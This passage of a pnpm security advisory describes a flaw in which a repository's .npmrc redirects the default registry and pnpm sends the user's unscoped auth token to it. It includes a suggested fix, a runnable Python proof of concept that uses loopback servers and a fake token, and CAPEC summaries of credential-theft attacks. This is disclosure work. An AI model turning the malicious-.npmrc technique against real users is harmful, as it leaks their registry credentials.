pnpm\u0027s config/auth-header flow, unscoped/default credentials are parsed from the merged auth config and stored as default credentials. The auth-header logic then maps those default credentials to the effective default registry. Because repository-local `.npmrc` can change the effective default registry, higher-trust default credentials can be applied to a lower-trust registry choice.\n\n## Suggested Fix Direction\n\nThe conservative fix direction is to reject or contain unscoped/default auth credentials when a lower-trust workspace/repository config changes the default registry. A compatibility-preserving fix could track the source layer of both the default registry and the default credentials, then only bind default credentials to a registry selected by the same or higher-trust source. A stricter npm-compatible fix would reject unscoped auth and require URL-scoped\ncredentials.\n\nThis needs maintainer semantic review and compatibility control because some legacy workflows may intentionally rely on default/unscoped auth.\n\n## Runnable Reproducer\n\nSave the following as `repro.py` and run it with Python 3 in an environment with pnpm and npm available. To force a specific pnpm version through Corepack, set `PR166_PNPM_SPEC`, for example `PR166_PNPM_SPEC=11.2.1`.\n\n```python\nimport base64\nimport contextlib\nimport hashlib\nimport http.server\nimport io\nimport json\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nimport threading\nfrom pathlib import Path\n\n\n\"\"\"Standalone loopback reproducer.\n\nIt creates only temporary directories and loopback HTTP servers. Cleanup is handled by TemporaryDirectory context managers and registry shutdown handlers; no persistent state is expected outside the package-manager cache directories inside the temporary home. Non-claims: this does not use real credentials, third-party registries, package scripts, or remote services. Failure paths return exit 1 or exit 2 through sys.exit(main()).\n\"\"\"\n\nTOKEN = \"PR166_FAKE_REGISTRY_TOKEN\"\nPACKAGE_TGZ = None\n\n\nclass RegistryHandler(http.server.BaseHTTPRequestHandler):\n requests = []\n\n def do_GET(self):\n self.requests.append(\n {\n \"method\": self.command,\n \"path\": self.path,\n \"authorization\": self.headers.get(\"Authorization\"),\n }\n )\n if self.path.endswith(\".tgz\"):\n payload = make_package_tgz()\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/octet-stream\")\n self.send_header(\"Content-Length\", str(len(payload)))\n self.end_headers()\n self.wfile.write(payload)\n return\n\n payload = make_package_tgz()\n body = json.dumps(\n {\n \"name\": \"@private/probe\",\n \"dist-tags\": {\"latest\": \"1.0.0\"},\n \"versions\": {\n \"1.0.0\": {\n \"name\": \"@private/probe\",\n \"version\": \"1.0.0\",\n \"dist\": {\n \"tarball\": f\"http://127.0.0.1:{self.server.server_port}/private/@private/probe/-/probe-1.0.0.tgz\",\n \"shasum\": hashlib.sha1(payload).hexdigest(),\n \"integrity\": \"sha512-\"\n + base64.b64encode(hashlib.sha512(payload).digest()).decode(\"ascii\"),\n },\n }\n },\n }\n ).encode(\"utf-8\")\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/json\")\n self.send_header(\"Content-Length\", str(len(body)))\n self.end_headers()\n self.wfile.write(body)\n\n def log_message(self, fmt, *args):\n return\n\n\n@contextlib.contextmanager\ndef registry():\n handler = type(\"RecordingRegistryHandler\", (RegistryHandler,), {\"requests\": []})\n server = http.server.ThreadingHTTPServer((\"127.0.0.1\", 0), handler)\n thread = threading.Thread(target=server.serve_forever, daemon=True)\n thread.start()\n try:\n yield server, handler.requests\n finally:\n server.shutdown()\n thread.join(timeout=5)\n server.server_close()\n\n\ndef make_package_tgz():\n global PACKAGE_TGZ\n if PACKAGE_TGZ is not None:\n return PACKAGE_TGZ\n bio = io.BytesIO()\n with tarfile.open(fileobj=bio, mode=\"w:gz\") as tf:\n data = b\u0027{\"name\":\"@private/probe\",\"version\":\"1.0.0\"}\\n\u0027\n info = tarfile.TarInfo(\"package/package.json\")\n info.size = len(data)\n tf.addfile(info, io.BytesIO(data))\n PACKAGE_TGZ = bio.getvalue()\n return PACKAGE_TGZ\n\n\ndef write_text(path, text):\n path.parent.mkdir(parents=True, exist_ok=True)\n path.write_text(text, encoding=\"utf-8\", newline=\"\\n\")\n\n\ndef run_install(tool, trusted_url, attacker_url):\n exe = shutil.which(tool)\n if exe is None:\n return {\"tool\": tool, \"error\": \"missing\"}\n cmd = [exe, \"install\", \"--ignore-scripts\"]\n if tool == \"pnpm\" and os.environ.get(\"PR166_PNPM_SPEC\"):\n corepack = shutil.which(\"corepack\")\n if corepack is None:\n return {\"tool\": tool, \"error\": \"corepack missing\"}\n cmd = [corepack, f\"pnpm@{os.environ[\u0027PR166_PNPM_SPEC\u0027]}\", \"install\", \"--ignore-scripts\"]\n\n with tempfile.TemporaryDirectory(prefix=f\"pr166-min-{tool}-\") as td:\n root = Path(td)\n home = root / \"home\"\n project = root / \"project\"\n home.mkdir()\n project.mkdir()\n userconfig = home / \".npmrc\"\n\n write_text(userconfig, f\"registry={trusted_url}\\n_authToken={TOKEN}\\n\")\n write_text(project / \".npmrc\", f\"registry={attacker_url}\\n\")\n write_text(\n project / \"package.json\",\n \u0027{\"name\":\"pr166-probe\",\"version\":\"1.0.0\",\"dependencies\":{\"@private/probe\":\"1.0.0\"}}\\n\u0027,\n )\n\n env = os.environ.copy()\n env.update(\n {\n \"HOME\": str(home),\n \"USERPROFILE\": str(home),\n \"NPM_CONFIG_USERCONFIG\": str(userconfig),\n \"npm_config_userconfig\": str(userconfig),\n \"NPM_CONFIG_CACHE\": str(home / \"cache\"),\n \"npm_config_cache\": str(home / \"cache\"),\n \"NPM_CONFIG_STORE_DIR\": str(home / \"store\"),\n \"npm_config_store_dir\": str(home / \"store\"),\n \"XDG_CACHE_HOME\": str(home / \"xdg-cache\"),\n \"XDG_DATA_HOME\": str(home / \"xdg-data\"),\n \"NO_COLOR\": \"1\",\n }\n )\n\n proc = subprocess.run(\n cmd,\n cwd=str(project),\n env=env,\n text=True,\n encoding=\"utf-8\",\n errors=\"replace\",\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n timeout=60,\n )\n return {\"tool\": tool, \"returncode\": proc.returncode, \"output_tail\": proc.stdout[-2000:]}\n\n\ndef summarize(tool, result, attacker_requests):\n auth_hits = [r for r in attacker_requests if r.get(\"authorization\")]\n return {\n \"tool\": tool,\n \"result\": result,\n \"attacker_auth_hits\": auth_hits,\n \"attacker_request_count\": len(attacker_requests),\n }\n\n\ndef tool_version(tool):\n exe = shutil.which(tool)\n if exe is None:\n return \"missing\"\n cmd = [exe, \"--version\"]\n if tool == \"pnpm\" and os.environ.get(\"PR166_PNPM_SPEC\"):\n corepack = shutil.which(\"corepack\")\n if corepack is None:\n return \"corepack missing\"\n cmd = [corepack, f\"pnpm@{os.environ[\u0027PR166_PNPM_SPEC\u0027]}\", \"--version\"]\n proc = subprocess.run(\n cmd,\n text=True,\n encoding=\"utf-8\",\n errors=\"replace\",\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n timeout=20,\n )\n return proc.stdout.strip() or f\"exit-{proc.returncode}\"\n\n\ndef main():\n pnpm_version = tool_version(\"pnpm\")\n npm_version = tool_version(\"npm\")\n print(f\"TARGET_VERSION=pnpm {pnpm_version}; npm {npm_version}\")\n if pnpm_version == \"missing\" or npm_version == \"missing\":\n print(\"CHECK environment_has_pnpm_and_npm result=fail\")\n return 1\n\n print(\"ENVIRONMENT_READY\")\n overall = []\n with registry() as (trusted, _trusted_requests), registry() as (attacker, attacker_requests):\n trusted_url = f\"http://127.0.0.1:{trusted.server_port}/private/\"\n attacker_url = f\"http://127.0.0.1:{attacker.server_port}/private/\"\n\n before = len(attacker_requests)\n pnpm_result = run_install(\"pnpm\", trusted_url, attacker_url)\n pnpm_summary = summarize(\"pnpm\", pnpm_result, attacker_requests[before:])\n overall.append(pnpm_summary)\n\n before = len(attacker_requests)\n npm_result = run_install(\"npm\", trusted_url, attacker_url)\n npm_summary = summarize(\"npm\", npm_result, attacker_requests[before:])\n overall.append(npm_summary)\n\n print(json.dumps(overall, indent=2))\n\n pnpm_leaked = bool(overall[0][\"attacker_auth_hits\"])\n npm_leaked = bool(overall[1][\"attacker_auth_hits\"])\n print(f\"OBSERVED_PNPM_AUTH_HITS={len(overall[0][\u0027attacker_auth_hits\u0027])}\")\n print(f\"OBSERVED_NPM_AUTH_HITS={len(overall[1][\u0027attacker_auth_hits\u0027])}\")\n print(\n \"COMMAND_EXIT_CODE=\"\n f\"pnpm:{overall[0][\u0027result\u0027].get(\u0027returncode\u0027, \u0027missing\u0027)} \"\n f\"npm:{overall[1][\u0027result\u0027].get(\u0027returncode\u0027, \u0027missing\u0027)}\"\n )\n if pnpm_leaked and not npm_leaked:\n print(\"CHECK pnpm_leaked=true npm_control_held=true result=pass\")\n print(\"VULNERABLE_BEHAVIOR_CONFIRMED\")\n print(\"RESULT_PNPM_REBINDS_UNSCOPED_USER_TOKEN_NPM_CONTROL_HELD\")\n print(\"RESULT_SECURITY_BOUNDARY_BYPASS_CONFIRMED\")\n return 0\n if pnpm_leaked and npm_leaked:\n print(\"CHECK pnpm_leaked=true npm_control_held=false result=fail\")\n print(\"RESULT_BOTH_TOOLS_SENT_AUTH\")\n return 2\n print(\"CHECK pnpm_leaked=false result=fail\")\n print(\"RESULT_NO_PNPM_AUTH_LEAK\")\n return 1\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n```\n\n## Abbreviated Expected Output\n\n```text\nTARGET_VERSION=pnpm 11.2.1; npm 10.9.7\nENVIRONMENT_READY\n...\nOBSERVED_PNPM_AUTH_HITS=3\nOBSERVED_NPM_AUTH_HITS=0\nCOMMAND_EXIT_CODE=pnpm:0 npm:1\nCHECK pnpm_leaked=true npm_control_held=true result=pass\nVULNERABLE_BEHAVIOR_CONFIRMED\nRESULT_PNPM_REBINDS_UNSCOPED_USER_TOKEN_NPM_CONTROL_HELD\nRESULT_SECURITY_BOUNDARY_BYPASS_CONFIRMED\n```\n\nReporter: JUNYI LIU",
"id": "GHSA-cjhr-43r9-cfmw",
"modified": "2026-06-26T22:59:25Z",
"published": "2026-06-26T22:59:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-cjhr-43r9-cfmw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50017"
},
{
"type": "PACKAGE",
"url": "https://github.com/pnpm/pnpm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "pnpm binds unscoped user-level npm auth credentials to a repository-selected registry"
}
Mitigation
Use an appropriate security mechanism to protect the credentials.
Mitigation
Make appropriate use of cryptography to protect the credentials.
Mitigation
Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.).
CAPEC-102: Session Sidejacking
Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.
CAPEC-474: Signature Spoofing by Key Theft
An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.
CAPEC-50: Password Recovery Exploitation
An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.
CAPEC-509: Kerberoasting
Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.
CAPEC-551: Modify Existing Service
When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.
CAPEC-555: Remote Services with Stolen Credentials
This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.
CAPEC-560: Use of Known Domain Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.
CAPEC-561: Windows Admin Shares with Stolen Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.
CAPEC-600: Credential Stuffing
An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.
CAPEC-644: Use of Captured Hashes (Pass The Hash)
An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.
CAPEC-645: Use of Captured Tickets (Pass The Ticket)
An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.
CAPEC-652: Use of Known Kerberos Credentials
An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain.
CAPEC-653: Use of Known Operating System Credentials
An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.